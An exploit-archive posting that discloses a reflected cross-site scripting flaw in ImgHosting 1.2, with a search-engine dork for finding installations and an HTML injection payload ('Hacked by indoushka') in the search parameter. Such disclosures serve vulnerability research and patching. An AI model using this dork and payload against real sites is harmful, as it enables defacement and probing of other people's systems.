ImgHosting 1.2 Cross Site Scripting

ImgHosting 1.2 Cross Site Scripting

Posted Aug 29, 2023

Authored by indoushka

ImgHosting version 1.2 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 3e0de4ff80dc516a1abe50185e5807a1e503d782b2cd24457e01031368191dc0

Download | Favorite | View

ImgHosting 1.2 Cross Site Scripting

====================================================================================================================================| # Title     : ImgHosting v1.2 XSS Vulnerability                                                                                  || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit)                                               | | # Vendor    : https://codecanyon.net/user/FoxSash/?ref=FoxSash                                                                   |  | # Dork      : "ImgHosting  Programming by FoxSash"                                                                               |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : ?search=<marquee><font color=lime size=32>Hacked by indoushka</font></marquee>[+] http://127.0.0.1/pikhostinom/?search=<marquee><font color=lime size=32>Hacked by indoushka</font></marquee>Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

File Tags

• ActiveX (932)
• Advisory (82,046)
• Arbitrary (16,219)
• BBS (2,859)
• Bypass (1,740)
• CGI (1,026)
• Code Execution (7,283)
• Conference (679)
• Cracker (841)
• CSRF (3,348)
• DoS (23,460)
• Encryption (2,370)
• Exploit (52,001)
• File Inclusion (4,225)
• File Upload (976)
• Firewall (821)
• Info Disclosure (2,788)
• Intrusion Detection (892)
• Java (3,045)
• JavaScript (859)
• Kernel (6,694)
• Local (14,460)
• Magazine (586)
• Overflow (12,693)
• Perl (1,423)
• PHP (5,149)
• Proof of Concept (2,339)
• Protocol (3,603)
• Python (1,535)
• Remote (30,816)
• Root (3,587)
• Rootkit (508)
• Ruby (612)
• Scanner (1,640)
• Security Tool (7,891)
• Shell (3,187)
• Shellcode (1,215)
• Sniffer (895)
• Spoof (2,207)
• SQL Injection (16,394)
• TCP (2,406)
• Trojan (687)
• UDP (893)
• Virus (666)
• Vulnerability (31,796)
• Web (9,671)
• Whitepaper (3,750)
• x86 (962)
• XSS (17,973)
• Other

File Archives

• August 2023
• July 2023
• June 2023
• May 2023
• April 2023
• March 2023
• February 2023
• January 2023
• December 2022
• November 2022
• October 2022
• September 2022
• Older

Systems

• AIX (428)
• Apple (2,002)
• BSD (373)
• CentOS (57)
• Cisco (1,925)
• Debian (6,822)
• Fedora (1,692)
• FreeBSD (1,244)
• Gentoo (4,322)
• HPUX (879)
• iOS (351)
• iPhone (108)
• IRIX (220)
• Juniper (67)
• Linux (46,543)
• Mac OS X (686)
• Mandriva (3,105)
• NetBSD (256)
• OpenBSD (485)
• RedHat (13,777)
• Slackware (941)
• Solaris (1,610)
• SUSE (1,444)
• Ubuntu (8,844)
• UNIX (9,301)
• UnixWare (186)
• Windows (6,579)
• Other